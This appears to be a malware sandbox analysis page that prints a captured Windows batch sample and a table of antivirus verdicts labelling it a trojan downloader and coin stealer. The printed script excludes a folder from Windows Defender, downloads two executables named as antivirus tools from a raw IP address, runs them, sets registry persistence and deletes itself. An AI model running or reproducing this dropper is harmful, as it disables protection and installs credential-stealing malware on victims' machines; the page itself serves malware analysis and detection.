Static | ZeroBOX
No static analysis available.
@echo off
REM Create a directory in C:\RM
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
REM Exclude the C:\RM directory from Windows Defender scans
powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
REM Download the main.exe file to the C:\RM directory
powershell -Command "Invoke-WebRequest 'http://85.209.133.18/LgGFdDAm/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
powershell -Command "Invoke-WebRequest 'http://85.209.133.18/LgGFdDAm/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
REM Run the downloaded main.exe file
start "" "C:\RM\AntiVirus.exe"
start "" "C:\RM\AntiVirus2.exe"
REM Add entry to the Windows Registry to run main.exe at startup
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
REM Clean up temporary files (optional)
REM del %TEMP%\lander.vbs
REM Exit the script
(goto) 2>nul & del "%~f0"
Antivirus             Signature
Bkav                  Clean
Lionic                Trojan.Script.Boxter.i!c
tehtris               Clean
Cynet                 Clean
CMC                   Clean
CAT-QuickHeal         Clean
Skyhigh               BehavesLike.Backdoor.zq
McAfee                Clean
Malwarebytes          Clean
Zillya                Clean
Sangfor               Clean
K7AntiVirus           Clean
K7GW                  Clean
Cybereason            Clean
Baidu                 Clean
VirIT                 Clean
Symantec              Trojan.Gen.NPE
ESET-NOD32            PowerShell/TrojanDownloader.Agent.GEI
TrendMicro-HouseCall  Clean
Avast                 Other:Malware-gen [Trj]
ClamAV                Clean
Kaspersky             HEUR:Trojan-PSW.BAT.Coins.gen
BitDefender           Heur.BZC.MNT.Boxter.928.27AEDF2A
NANO-Antivirus        Clean
ViRobot               Clean
MicroWorld-eScan      Heur.BZC.MNT.Boxter.928.27AEDF2A
Tencent               Win32.Trojan-Downloader.Downloader.Pjgl
Sophos                Clean
F-Secure              Clean
DrWeb                 Clean
VIPRE                 Heur.BZC.MNT.Boxter.928.27AEDF2A
TrendMicro            Clean
FireEye               Heur.BZC.MNT.Boxter.928.27AEDF2A
Emsisoft              Heur.BZC.MNT.Boxter.928.27AEDF2A (B)
Jiangmin              Clean
Avira                 Clean
MAX                   malware (ai score=87)
Antiy-AVL             Clean
Kingsoft              Win32.Troj.Undef.a
Gridinsoft            Clean
Xcitium               Clean
Arcabit               Heur.BZC.MNT.Boxter.928.27AEDF2A [many]
SUPERAntiSpyware      Clean
ZoneAlarm             HEUR:Trojan-PSW.BAT.Coins.gen
GData                 Heur.BZC.MNT.Boxter.928.2856D07C
Varist                Clean
AhnLab-V3             Clean
Acronis               Clean
ALYac                 Clean
TACHYON               Clean
VBA32                 Clean
Zoner                 Clean
Rising                Clean
Yandex                Clean
Ikarus                Trojan-Downloader.PowerShell.Agent
MaxSecure             Clean
Fortinet              Clean
BitDefenderTheta      Clean
AVG                   Other:Malware-gen [Trj]
Panda                 Clean
CrowdStrike           Clean
alibabacloud          Trojan[stealer]:Win/Coins.gyf
No IRMA results available.